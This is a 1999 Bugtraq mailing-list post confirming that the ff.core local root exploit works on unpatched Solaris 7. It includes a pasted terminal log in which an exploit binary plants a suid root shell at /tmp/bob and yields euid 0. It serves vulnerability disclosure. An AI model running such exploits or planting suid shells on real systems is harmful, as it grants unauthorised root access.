Bugtraq mailing list archives
ff.core exploit on Solaris (2.)7
From: dfrasnel () CSEE WVU EDU (Daniel J. Frasnelli)
Date: Fri, 8 Jan 1999 12:43:20 -0500
Greetings,

Confirmed ff.core exploit does exist in Solaris 7, server edition. System is straight installation, no patches of any category available for 7 from Sunsolve yet.

Daniel

(12:32,99-01-08) (dfrasnel@rogue)[~]> uname -spr
SunOS 5.7 sparc
(12:34,99-01-08) (dfrasnel@rogue)[~]> ./test
Testing if exploit is possible...
Test successful. Proceeding...
Backing up clobbered files to /tmp/.bk
Doing sploit...
Done with sploit. Testing and trying to clean up now...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Connection closed by foreign host.
w00p! Should have a suid root sh in /tmp/bob
btw, its rksh because solaris is silly
Let me try to clean up my mess...
everything should be cool.. i think :>
# ls -la /tmp/bob
-rwsr-xr-x 1 root root 192764 Jan 8 12:32 /tmp/bob
# id
(snip) euid=0(root)